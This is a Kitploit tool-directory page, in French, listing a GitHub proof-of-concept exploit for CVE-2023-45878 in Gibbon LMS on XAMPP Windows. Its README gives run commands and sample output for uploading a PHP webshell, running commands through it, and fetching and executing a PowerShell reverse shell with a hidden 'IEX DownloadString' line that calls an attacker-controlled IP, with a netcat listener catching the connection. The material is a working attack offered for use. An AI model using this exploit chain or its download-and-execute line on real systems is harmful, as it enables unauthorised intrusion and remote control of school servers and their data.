Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-45878-POC — PoC CVE-2023-45878 pour gibbon LMS sur xampp windows | Kitploit
Outils/GitHubGitHub/pauldhaes/cve-2023-45878-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubpauldhaes/cve-2023-45878-poc

CVE-2023-45878-POC

PoC CVE-2023-45878 pour gibbon LMS sur xampp windows

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-45878-POC

CVE-2023-45878 PoC pour Gibbon LMS sur XAMPP Windows. Télécharge un webshell nommé shell.php pour l'injection de commandes. Pour un reverse shell, télécharge un script PowerShell reverse shell .ps1 appelé shell.ps1 qui est téléchargé sur la machine cible en utilisant shell.php.

Prérequis

Python3 Module requests (Python3) netcat

pip3 install requests

Environnement virtuel

mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests

Utilisation

Testé sur Gibbon LMS tournant sous XAMPP Windows sans antivirus activé. La cible peut être trouvée via la page de connexion de Gibbon, par exemple http://gibbon-example/Gibbon-LMS/

Reverse shell

python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT

Résultat

[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>

Commande unique

python3 reverse.py --single -target_url http://target -command whoami

Résultat

[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice

Crédits

https://herolab.usd.de/security-advisories/usd-2023-0025/

Télécharger l’outil